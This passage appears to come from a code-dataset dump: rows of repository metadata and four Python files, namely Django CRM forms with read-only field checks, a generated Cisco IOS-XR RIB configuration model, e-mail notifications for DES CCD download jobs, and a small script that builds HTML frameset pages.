'c8e9c1e89f02ef259eefb9bd4f081424', '1345a3275fd61112edae89b467dfba76', '3b606300513e10aaf619c3abe1293a33', '484a6509294a2a4f6b43e44be007e71d', '48a0f2e6e56782650d8d2d4b69f56634', 'd4d2289b4fec73b39e17aea4016ec399', '63bf08514b96228ad42568002c52c003', 'fdf0afc7f915006f1c14bedf8582b7b4', 'b0955f92bd09b64c2956730236561e4d', 'af398281bbe63809c472df7e2126b186', 'fc44b52adff12ab46e73948df4aa036f', '4d08c42a9542cc4d124cde780733ef3b', '9f66f45b03e8ca58394c277864dae3a0', 'fb360585bcf60b965d5fe0f58b45ea2a', '633574f832553142836dcb391d619631', '255408410b2821831e2cdd806796298a', 'b4f9853ebc74b47eaa8e08ff01557300', 'cac3cc62de1fa416f6cfc9fa865cb951', '27a79e749bb3812eb2b62b627d0f3692', '04305ad76292e7dea9a4c2e7a72c22f4', '507f355787daff3245e08eecc86ff089', 'e802055ee9084e553d617846dd7b784e', '105fb35e2b335ef08275b9c71ac57b69', 'ad9cd7fb0d86b0c46cd77614dc236575', '395ca33e04ad84168fe7cc5b294188a7', 'fc99e9570aa1e73162f0a3950d671d49', '6fb78cedd3fc23d4427b8849953325bd', '1af2da2cb628c40174131a337606edfb', '4fc4390da1c42df75a89e3a77f022aad', '79cc98515b7294e25fa8640b7fe6f206', '79ce433d34eed22079b85686b77013c5', '2ec61e16ada8be8c5061d2938296cc16', 'be6c4c0f7cffad97c0c5a70440ff0821', '628b3363ca7b8f0dc09aca7753d85e0d', 'bf8dbf137d68fec4c46a389f82aaf5c7', '795c107a8cd8f9aff51b53e0df124437', '46f73f2a62e94cf40438f939ca622240', 'fdab5de855f08381cd72494692f7db67', 'e7cf2a8c144ff1b1ccbaefe838cf83b5', 'dedc91d82b6ccff5bfdfc48d0d8fcd9c', 'd4afe54e9f72a5f286e6d1795be0b9be', '8ba7808e7ee2ae95da22fb1b58e8a8ff', 'fd45dac828d4dea5dfbbba900bd831fa', 'fba4f3c18f877746910786581053b689', 'b256ba885f4e84d7c3b23e994879ea04', '9017a7f389cf0597c0d0216c3cd360b8', '08163df1290e12b82629838f11d7f198', 'b80ca797b413c68a6349b99badc82c55', 'fbc6f1463e3dafc35dbeaf05e2cb763a', '105fff32bfb297656d58cf84ef430426', '4c92e25759c72a8f9455d22b6215b67b', 'dc5540924ea2a21a0c758027a34dab71', '21e7e88f91c74a54f4a02bf76991b03f', '0994fc1d2a5f6c492bf8fb180d5dcc0e', '7200fddff45d15f16226907349f02fdf', '7d584237a5730f0df29b359e377f210c', '15443d81c54e6889e89aef165cc19e76', '5a1b36d9a6117bf86212a29e8730948f', 'e402e254508b0d788c8f89e6df9f2a6c', '450ddf5a983e2df1485f8a58bbe4d345', 'e62d0bdb6abac8f862cdc98e923f7e6c', '3f518eb74a8c315ad1c4c121dfc35530', 'b1131e6e319740b2d9a94dfbbf148d7e', '5c0829beb918c7e5e3d26d35dde4bc59', '7516547445f7fd2df36b259c0e706eaa', '252381c2a28d932f8eadb6e83869d6f4', 'f876d280f09fd443f6e7b903741de977', 'f6830f785ea0e2646af92c7afe8d948e', '781eff4e440d43c1ad5ede452aba7a2d', '01b2f3629faee9a6aeb054f791fc9fd5', '6121338892cb90556d909535d8afc5b3', '4d2f46e02f5a1ee1b971c820edf30bd2', 'e0117dc99f22c1ff8bb7b40e86d9a30f', 'abc93ad1a918fe685f502a1026e058de', '698eb31fe74f1f657cdc0e7963dc0c73', '00525bb06d05d7444758a15b4fdd1eef', '8b7e6cd232b2e9612eff28cf98a68a12', '44aace24db482c7fea102821feaed499', '6e8fd23971186ec88d83ff034ceabcab', '8de493269e803f95a240015c52b82e03', 'a488234b227e31aec60bd9f3c96ae8e8', '7bbf539f18db26989ac57e9d47acb2a0', 'b10f027b42fba99ce43d6e20ea041d57', '0aaa1d45bf9e71b50abccb70a7e32f23', 'c7143d577599ea626e3bef8183f6456b', '5c64af0cde8c0ec72cf1f561f8d055b9', '6b3f4aeb870956a9ec8a592acd8f742d', '95c9e40a028d821c5a2342e0faa56bd8', 'd7fb49d295618bbcb5215435f18c2525', 'cfec9c317c79407c4b6b9b81ce23593d', 'a7c70b748213656f966a0f08861ebd65', 'f5a0d77f70153e543d47de8c0ab4ce8a', '37eacc86cd29cea5de6e8c884ab09a25', '0e12bc012e024da60e7ab01c367a5f81', 'abd5bf3cff6083cf389568982825ddf4', '5d9e2c80a586c338999ed57dad439aa7', 'fcfadc95363b82fc3aa8f8fdce647b41', '83f92956f4ccdd656ebc8c8fdc724cc1', '45132849ec367f7fc3988e4cc669838c', '1400a29a65ed279223a7146fd596a73f', '2107927c6b74c2ce7fbd7331a3b09889', '5e79858dec2c9839216f27af03d77e9f', '260f514be6c390373758aa5fb485259e', 'eb0567492bf4e43ff9443e2b4ff420d8', '9155b1c0fbeadf7f1e09409011734a23', 'abcc710d8fac72774c62626f021771f9', '0d957fe7206fc6cbfd243e1411f7918d', 'f3915aa28a21e0e212599f3dc89d6162', 'dfc784013251bf1fadadb6a3372bd8bd', 'f536ae81391686beaf370b138069ac55', '58ba7646f56fa37ce3450a97193019aa', 'e3da4b51388fea77c9c40c209b9fe485', '2a5774842d04a7a5c9e19cf441ac6841', '480b96736f67c18ff3043f65dfee22be', '5db19f3a92bd0bcf99c32df416bb6964', '121695657110b5f93a11657b3531840b', '26ed3c6abc7bdceb66973df26b1e363f', '5a44b61a36d7763f62675ab816a92fc8', 'c7905648eff144a891de232f7ab4186d', '52a49f764c14f34e15790d20fc7af335', '47239449432aacf8791754f91fc19d54', '08bda4212559bc5748b54e7be64c7c03', '59f885d7d058135189e91d55663f8c96', '6cb3a6dedbff716809d61474eb50d7dc', '1877d2d3e9ca6533d16e62418e57ce35', '06f3495c06fb7f3ea038c9631b8ac0f2', '40724ac0d3dc32ab099ac5f6f0c672e8', 'dd7d07fcb7a619c1eb160ec82d2f8fe1', '82ab8b1b6aceef890510d6cb28509f2e', '4d47883923229b56d762f9a7eca98e4b', '96e030c02bc48fae3ff05c35f7afebfa', '4f90865ccdfec90397c858fb8bc8562e', 'b025411b5a340a647b92e667d1e3ec5e', 'c2d9657441d4d7a5149b883e4f4e263d', '2be08283bc5f9f750d74d36d0e583228', '40ee50b0d5ca5d195a26ff5487d7191f', '3d750c73a434c306557c7d52ff401129', '3600fbf3ca9100b1aafb16e5d296e514', '89268477b2917b73b8f012c055d2b666', 'bbc29fe9792105d11bd208982aaa882e', '91776fd87ef846300083a2aecfd4e232', 'b5db77dafcf3767b1182ccc92db4737f', 'c028a516cf9a813aab52231ae28a3ae5', 'f22698d511e87b02555b0f97e829d8db'] | 753.7 | 7,209 | 0.880058 | 241 | 7,537 | 27.514523 | 0.929461 | 0.005127 | 0.003921 | 0.004826 | 0.008747 | 0.008747 | 0.008747 | 0.008747 | 0 | 0 | 0 | 0.553895 | 0.032506 | 7,537 | 10 | 7,209 | 753.7 | 0.355458 | 0 | 0 | 0 | 1 | 0.111111 | 0.864789 | 0.850046 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0 | 0 | 0.222222 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
01215a6fcf6da9f1e1cc6573026939711cfa3e91 | 3,457 | py | Python | taotao-cloud-python/taotao-cloud-oldboy/day90-rabbitmq/PerfectCRM-restful api/crm/forms.py | shuigedeng/taotao-cloud-paren | 3d281b919490f7cbee4520211e2eee5da7387564 | [
"Apache-2.0"
] | 47 | 2021-04-13T10:32:13.000Z | 2022-03-31T10:30:30.000Z | taotao-cloud-python/taotao-cloud-oldboy/day90-rabbitmq/PerfectCRM-restful api/crm/forms.py | shuigedeng/taotao-cloud-paren | 3d281b919490f7cbee4520211e2eee5da7387564 | [
"Apache-2.0"
] | 1 | 2021-11-01T07:41:04.000Z | 2021-11-01T07:41:10.000Z | taotao-cloud-python/taotao-cloud-oldboy/day90-rabbitmq/PerfectCRM-restful api/crm/forms.py | shuigedeng/taotao-cloud-paren | 3d281b919490f7cbee4520211e2eee5da7387564 | [
"Apache-2.0"
] | 21 | 2021-04-13T10:32:17.000Z | 2022-03-26T07:43:22.000Z |
from django.forms import ModelForm
from django import forms
from crm import models
class EnrollmentForm(ModelForm):
def __new__(cls, *args, **kwargs):
print("__new__",cls,args,kwargs)
for field_name in cls.base_fields:
filed_obj = cls.base_fields[field_name]
filed_obj.widget.attrs.update({'class':'form-control'})
if field_name in cls.Meta.readonly_fields:
filed_obj.widget.attrs.update({'disabled': 'true'})
return ModelForm.__new__(cls)
class Meta:
model = models.StudentEnrollment
#fields = ['name','consultant','status']
fields = "__all__"
exclude = ['contract_approved_date']
readonly_fields = ['contract_agreed',]
def clean(self):
'''form defautl clean method'''
# print("\033[41;1mrun form defautl clean method...\033[0m",dir(self))
# print(self.Meta.admin.readonly_fields)
print("cleaned_dtat:",self.cleaned_data)
if self.errors:
raise forms.ValidationError(("Please fix errors before re-submit."))
if self.instance.id is not None :#means this is a change form ,should check the readonly fields
for field in self.Meta.readonly_fields:
old_field_val = getattr(self.instance,field) #数据库里的数据
form_val = self.cleaned_data.get(field)
print("filed differ compare:",old_field_val,form_val)
if old_field_val != form_val:
self.add_error(field,"Readonly Field: field should be '{value}' ,not '{new_value}' ".\
format(**{'value':old_field_val,'new_value':form_val}))
class CustomerForm(ModelForm):
def __new__(cls, *args, **kwargs):
print("__new__",cls,args,kwargs)
for field_name in cls.base_fields:
filed_obj = cls.base_fields[field_name]
filed_obj.widget.attrs.update({'class':'form-control'})
if field_name in cls.Meta.readonly_fields:
filed_obj.widget.attrs.update({'disabled': 'true'})
#print("--new meta:",cls.Meta)
#print(cls.Meta.exclude)
return ModelForm.__new__(cls)
class Meta:
model = models.CustomerInfo
#fields = ['name','consultant','status']
fields = "__all__"
exclude = ['consult_content','status','consult_courses']
readonly_fields = ['contact_type','contact','consultant','referral_from','source']
def clean(self):
'''form defautl clean method'''
# print("\033[41;1mrun form defautl clean method...\033[0m",dir(self))
# print(self.Meta.admin.readonly_fields)
print("cleaned_dtat:",self.cleaned_data)
if self.errors:
raise forms.ValidationError(("Please fix errors before re-submit."))
if self.instance.id is not None :#means this is a change form ,should check the readonly fields
for field in self.Meta.readonly_fields:
old_field_val = getattr(self.instance,field) #数据库里的数据
form_val = self.cleaned_data.get(field)
print("filed differ compare:",old_field_val,form_val)
if old_field_val != form_val:
self.add_error(field,"Readonly Field: field should be '{value}' ,not '{new_value}' ".\
format(**{'value':old_field_val,'new_value':form_val}))
| 39.735632 | 106 | 0.610934 | 415 | 3,457 | 4.850602 | 0.236145 | 0.069548 | 0.043716 | 0.031793 | 0.843517 | 0.843517 | 0.843517 | 0.801788 | 0.761053 | 0.761053 | 0 | 0.007902 | 0.267862 | 3,457 | 86 | 107 | 40.197674 | 0.787436 | 0.154469 | 0 | 0.8 | 0 | 0 | 0.170925 | 0.007597 | 0 | 0 | 0 | 0 | 0 | 1 | 0.072727 | false | 0 | 0.054545 | 0 | 0.236364 | 0.109091 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0155cfb6c76717196c230fbb35786a7e77af0931 | 14,902 | py | Python | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ip_rib_cfg.py | tkamata-test/ydk-py | b637e7853a8edbbd31fbc05afa3aa4110b31c5f9 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ip_rib_cfg.py | tkamata-test/ydk-py | b637e7853a8edbbd31fbc05afa3aa4110b31c5f9 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ip_rib_cfg.py | tkamata-test/ydk-py | b637e7853a8edbbd31fbc05afa3aa4110b31c5f9 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | """ Cisco_IOS_XR_ip_rib_cfg
This module contains a collection of YANG definitions
for Cisco IOS\-XR ip\-rib package configuration.
This module contains definitions
for the following management objects\:
rib\: RIB configuration.
This YANG module augments the
Cisco\-IOS\-XR\-infra\-rsi\-cfg
module with configuration data.
Copyright (c) 2013\-2016 by Cisco Systems, Inc.
All rights reserved.
"""
import re
import collections
from enum import Enum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk.errors import YPYError, YPYModelError
class Rib(object):
"""
RIB configuration.
.. attribute:: af
RIB address family configuration
**type**\: :py:class:`Af <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rib_cfg.Rib.Af>`
.. attribute:: max_recursion_depth
Set maximum depth for route recursion check
**type**\: int
**range:** 5..16
"""
_prefix = 'ip-rib-cfg'
_revision = '2015-11-09'
def __init__(self):
self.af = Rib.Af()
self.af.parent = self
self.max_recursion_depth = None
class Af(object):
"""
RIB address family configuration
.. attribute:: ipv4
IPv4 configuration
**type**\: :py:class:`Ipv4 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rib_cfg.Rib.Af.Ipv4>`
.. attribute:: ipv6
IPv6 configuration
**type**\: :py:class:`Ipv6 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rib_cfg.Rib.Af.Ipv6>`
"""
_prefix = 'ip-rib-cfg'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.ipv4 = Rib.Af.Ipv4()
self.ipv4.parent = self
self.ipv6 = Rib.Af.Ipv6()
self.ipv6.parent = self
class Ipv4(object):
"""
IPv4 configuration
.. attribute:: next_hop_dampening_disable
Disable next\-hop dampening
**type**\: :py:class:`Empty<ydk.types.Empty>`
.. attribute:: redistribution_history
Redistribution history related configs
**type**\: :py:class:`RedistributionHistory <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rib_cfg.Rib.Af.Ipv4.RedistributionHistory>`
"""
_prefix = 'ip-rib-cfg'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.next_hop_dampening_disable = None
self.redistribution_history = Rib.Af.Ipv4.RedistributionHistory()
self.redistribution_history.parent = self
class RedistributionHistory(object):
"""
Redistribution history related configs
.. attribute:: bcdl_client
Maximum BCDL redistribution history size
**type**\: int
**range:** 10..2000000
.. attribute:: keep
Retain redistribution history after disconnect
**type**\: :py:class:`Keep <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rib_cfg.Rib.Af.Ipv4.RedistributionHistory.Keep>`
.. attribute:: protocol_client
Maximum protocol redistribution history size
**type**\: int
**range:** 10..250000
"""
_prefix = 'ip-rib-cfg'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.bcdl_client = None
self.keep = Rib.Af.Ipv4.RedistributionHistory.Keep()
self.keep.parent = self
self.protocol_client = None
class Keep(object):
"""
Retain redistribution history after disconnect.
.. attribute:: bcdl
Enable retain BCDL history
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'ip-rib-cfg'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.bcdl = None
@property
def _common_path(self):
return '/Cisco-IOS-XR-ip-rib-cfg:rib/Cisco-IOS-XR-ip-rib-cfg:af/Cisco-IOS-XR-ip-rib-cfg:ipv4/Cisco-IOS-XR-ip-rib-cfg:redistribution-history/Cisco-IOS-XR-ip-rib-cfg:keep'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return True
def _has_data(self):
if not self.is_config():
return False
if self.bcdl is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rib_cfg as meta
return meta._meta_table['Rib.Af.Ipv4.RedistributionHistory.Keep']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-ip-rib-cfg:rib/Cisco-IOS-XR-ip-rib-cfg:af/Cisco-IOS-XR-ip-rib-cfg:ipv4/Cisco-IOS-XR-ip-rib-cfg:redistribution-history'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return True
def _has_data(self):
if not self.is_config():
return False
if self.bcdl_client is not None:
return True
if self.keep is not None and self.keep._has_data():
return True
if self.protocol_client is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rib_cfg as meta
return meta._meta_table['Rib.Af.Ipv4.RedistributionHistory']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-ip-rib-cfg:rib/Cisco-IOS-XR-ip-rib-cfg:af/Cisco-IOS-XR-ip-rib-cfg:ipv4'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return True
def _has_data(self):
if not self.is_config():
return False
if self.next_hop_dampening_disable is not None:
return True
if self.redistribution_history is not None and self.redistribution_history._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rib_cfg as meta
return meta._meta_table['Rib.Af.Ipv4']['meta_info']
class Ipv6(object):
"""
IPv6 configuration
.. attribute:: next_hop_dampening_disable
Disable next\-hop dampening
**type**\: :py:class:`Empty<ydk.types.Empty>`
.. attribute:: redistribution_history
Redistribution history related configs
**type**\: :py:class:`RedistributionHistory <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rib_cfg.Rib.Af.Ipv6.RedistributionHistory>`
"""
_prefix = 'ip-rib-cfg'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.next_hop_dampening_disable = None
self.redistribution_history = Rib.Af.Ipv6.RedistributionHistory()
self.redistribution_history.parent = self
class RedistributionHistory(object):
"""
Redistribution history related configs
.. attribute:: bcdl_client
Maximum BCDL redistribution history size
**type**\: int
**range:** 10..2000000
.. attribute:: keep
Retain redistribution history after disconnect
**type**\: :py:class:`Keep <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rib_cfg.Rib.Af.Ipv6.RedistributionHistory.Keep>`
.. attribute:: protocol_client
Maximum protocol redistribution history size
**type**\: int
**range:** 10..250000
"""
_prefix = 'ip-rib-cfg'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.bcdl_client = None
self.keep = Rib.Af.Ipv6.RedistributionHistory.Keep()
self.keep.parent = self
self.protocol_client = None
class Keep(object):
"""
Retain redistribution history after disconnect.
.. attribute:: bcdl
Enable retain BCDL history
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'ip-rib-cfg'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.bcdl = None
@property
def _common_path(self):
return '/Cisco-IOS-XR-ip-rib-cfg:rib/Cisco-IOS-XR-ip-rib-cfg:af/Cisco-IOS-XR-ip-rib-cfg:ipv6/Cisco-IOS-XR-ip-rib-cfg:redistribution-history/Cisco-IOS-XR-ip-rib-cfg:keep'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return True
def _has_data(self):
if not self.is_config():
return False
if self.bcdl is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rib_cfg as meta
return meta._meta_table['Rib.Af.Ipv6.RedistributionHistory.Keep']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-ip-rib-cfg:rib/Cisco-IOS-XR-ip-rib-cfg:af/Cisco-IOS-XR-ip-rib-cfg:ipv6/Cisco-IOS-XR-ip-rib-cfg:redistribution-history'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return True
def _has_data(self):
if not self.is_config():
return False
if self.bcdl_client is not None:
return True
if self.keep is not None and self.keep._has_data():
return True
if self.protocol_client is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rib_cfg as meta
return meta._meta_table['Rib.Af.Ipv6.RedistributionHistory']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-ip-rib-cfg:rib/Cisco-IOS-XR-ip-rib-cfg:af/Cisco-IOS-XR-ip-rib-cfg:ipv6'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return True
def _has_data(self):
if not self.is_config():
return False
if self.next_hop_dampening_disable is not None:
return True
if self.redistribution_history is not None and self.redistribution_history._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rib_cfg as meta
return meta._meta_table['Rib.Af.Ipv6']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-ip-rib-cfg:rib/Cisco-IOS-XR-ip-rib-cfg:af'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return True
def _has_data(self):
if not self.is_config():
return False
if self.ipv4 is not None and self.ipv4._has_data():
return True
if self.ipv6 is not None and self.ipv6._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rib_cfg as meta
return meta._meta_table['Rib.Af']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-ip-rib-cfg:rib'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return True
def _has_data(self):
if not self.is_config():
return False
if self.af is not None and self.af._has_data():
return True
if self.max_recursion_depth is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rib_cfg as meta
return meta._meta_table['Rib']['meta_info']
| 32.116379 | 193 | 0.503489 | 1,550 | 14,902 | 4.632903 | 0.08129 | 0.066843 | 0.083554 | 0.073527 | 0.87077 | 0.860883 | 0.85197 | 0.85197 | 0.85197 | 0.85197 | 0 | 0.017524 | 0.414105 | 14,902 | 463 | 194 | 32.185745 | 0.804948 | 0.246276 | 0 | 0.802956 | 0 | 0.034483 | 0.127945 | 0.100765 | 0 | 0 | 0 | 0 | 0 | 1 | 0.197044 | false | 0 | 0.064039 | 0.039409 | 0.586207 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
0157da3a7107d40f8bb243b0513f8c4cd7c72bce | 4,623 | py | Python | core_admin/des/ccd/notify.py | linea-it/tno | f973381280504ceb1b606b5b3ccc79b6b8c2aa4f | [
"MIT"
] | null | null | null | core_admin/des/ccd/notify.py | linea-it/tno | f973381280504ceb1b606b5b3ccc79b6b8c2aa4f | [
"MIT"
] | 112 | 2018-04-24T19:10:55.000Z | 2022-02-26T16:55:02.000Z | core_admin/des/ccd/notify.py | linea-it/tno | f973381280504ceb1b606b5b3ccc79b6b8c2aa4f | [
"MIT"
] | null | null | null |
import logging
import traceback
import humanize
from common.notify import Notify
from des.dao import DownloadCcdJobDao
logger = logging.getLogger('download_ccds')
def notify_start_job(job_id):
try:
db = DownloadCcdJobDao(pool=False)
# Recupera o Model pelo ID
job = db.get_by_id(job_id)
user = db.get_user(job['owner_id'])
context = dict({
"username": user['username'],
"job_id": job['id'],
"start": job['date_initial'],
"end": job['date_final'],
"dynclass": job['dynclass'],
"nights": job['nights'],
"asteroids": job['asteroids'],
"ccds_to_download": job['ccds_to_download'],
"estimated_execution_time": str(job['estimated_execution_time']).split('.')[0],
"estimated_t_size": humanize.naturalsize(int(job['estimated_t_size'])),
})
Notify().send_html_email(
subject="Download DES CCDs Job %s Started" % job_id,
to=user['email'],
template="notification_download_ccd_start.html",
context=context)
logger.info("Sending start email to the user")
except Exception as e:
trace = traceback.format_exc()
logger.error(trace)
logger.error(e)
def notify_fail_job(job_id):
try:
db = DownloadCcdJobDao(pool=False)
# Recupera o Model pelo ID
job = db.get_by_id(job_id)
user = db.get_user(job['owner_id'])
context = dict({
"username": user['username'],
"job_id": job['id'],
"job_start": job['start'].strftime("%Y-%m-%d %H:%M:%S"),
"job_end": job['finish'].strftime("%Y-%m-%d %H:%M:%S"),
"execution_time": str(job['execution_time']).split(".")[0],
})
Notify().send_html_email(
subject="Download DES CCDs Job %s Failed" % job_id,
to=user['email'],
template="notification_download_ccd_fail.html",
context=context)
logger.info("Sending Fail email to the user")
except Exception as e:
trace = traceback.format_exc()
logger.error(trace)
logger.error(e)
def notify_finish_job(job_id):
try:
db = DownloadCcdJobDao(pool=False)
# Recupera o Model pelo ID
job = db.get_by_id(job_id)
user = db.get_user(job['owner_id'])
context = dict({
"username": user['username'],
"job_id": job['id'],
"start": job['date_initial'],
"end": job['date_final'],
"job_start": job['start'].strftime("%Y-%m-%d %H:%M:%S"),
"job_end": job['finish'].strftime("%Y-%m-%d %H:%M:%S"),
"dynclass": job['dynclass'],
"nights": job['nights'],
"asteroids": job['asteroids'],
"ccds_to_download": job['ccds_to_download'],
"ccds_downloaded": job['ccds_downloaded'],
"estimated_execution_time": str(job['estimated_execution_time']).split('.')[0],
"execution_time": str(job['execution_time']).split('.')[0],
"estimated_t_size": humanize.naturalsize(int(job['estimated_t_size'])),
"t_size_downloaded": humanize.naturalsize(int(job['t_size_downloaded'])),
})
Notify().send_html_email(
subject="Download DES CCDs Job %s Finished" % job_id,
to=user['email'],
template="notification_download_ccd_finish.html",
context=context)
logger.info("Sending Finish email to the user")
except Exception as e:
trace = traceback.format_exc()
logger.error(trace)
logger.error(e)
def notify_abort_job(job_id):
try:
db = DownloadCcdJobDao(pool=False)
# Recupera o Model pelo ID
job = db.get_by_id(job_id)
user = db.get_user(job['owner_id'])
context = dict({
"username": user['username'],
"job_id": job['id'],
"job_start": job['start'].strftime("%Y-%m-%d %H:%M:%S"),
"job_end": job['finish'].strftime("%Y-%m-%d %H:%M:%S"),
"execution_time": str(job['execution_time']).split(".")[0],
})
Notify().send_html_email(
subject="Download DES CCDs Job %s Aborted" % job_id,
to=user['email'],
template="notification_download_ccd_abort.html",
context=context)
logger.info("Sending Abort email to the user")
except Exception as e:
trace = traceback.format_exc()
logger.error(trace)
logger.error(e)
| 32.556338 | 91 | 0.56392 | 554 | 4,623 | 4.505415 | 0.149819 | 0.040064 | 0.022436 | 0.026442 | 0.871795 | 0.871795 | 0.815705 | 0.815705 | 0.808093 | 0.732772 | 0 | 0.001511 | 0.284015 | 4,623 | 141 | 92 | 32.787234 | 0.752568 | 0.021415 | 0 | 0.770642 | 0 | 0 | 0.280876 | 0.053121 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036697 | false | 0 | 0.045872 | 0 | 0.082569 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6db01fd92286266f618e6ac3255e6aba8c49941f | 1,462 | py | Python | main/htmlmerge.py | opensource-projectteam16/Feed_Me_Server | 79739112c4e254fde047a5cd34e06394407adc2a | [
"MIT"
] | 2 | 2019-05-30T10:17:14.000Z | 2020-09-10T02:28:05.000Z | main/htmlmerge.py | opensource-projectteam16/Feed_Me_Server | 79739112c4e254fde047a5cd34e06394407adc2a | [
"MIT"
] | 21 | 2019-05-29T14:47:26.000Z | 2021-12-13T19:59:33.000Z | main/htmlmerge.py | opensource-projectteam16/Feed_Me_Server | 79739112c4e254fde047a5cd34e06394407adc2a | [
"MIT"
] | 7 | 2019-05-27T04:32:42.000Z | 2019-06-21T10:40:38.000Z | from bs4 import BeautifulSoup
def double_shape(filenumber,filename):
fnum="*"
for i in range(filenumber-1):
if i%2==1:
fnum=fnum+",*"
fname=""
for i in range(len(filename)):
if i%2==0:
fname=fname+"<frameset cols=*,*>"
fname=fname+"<frame src="+str(filename[i])+">"
if i%2==1:
fname=fname+"</frameset>"
print(fname)
html_doc = "<html><frameset rows="+fnum+">"+fname+"</frameset>"
q=BeautifulSoup(html_doc, 'html.parser')
open('thing.html', "w").write(str(q))
def row_shape(filenumber,filename):
fnum="*"
for i in range(filenumber-1):
if i%2==1:
fnum=fnum+",*"
fname=""
for i in range(len(filename)):
fname=fname+"<frame src="+str(filename[i])+">"
print(fname)
html_doc = "<html><frameset rows="+fnum+">"+fname+"</frameset>"
q=BeautifulSoup(html_doc, 'html.parser')
open('thing.html', "w").write(str(q))
def col_shape(filenumber,filename):
fnum="*"
for i in range(filenumber-1):
if i%2==1:
fnum=fnum+",*"
fname=""
for i in range(len(filename)):
fname=fname+"<frame src="+str(filename[i])+">"
print(fname)
html_doc = "<html><frameset cols="+fnum+">"+fname+"</frameset>"
q=BeautifulSoup(html_doc, 'html.parser')
open('thing.html', "w").write(str(q))
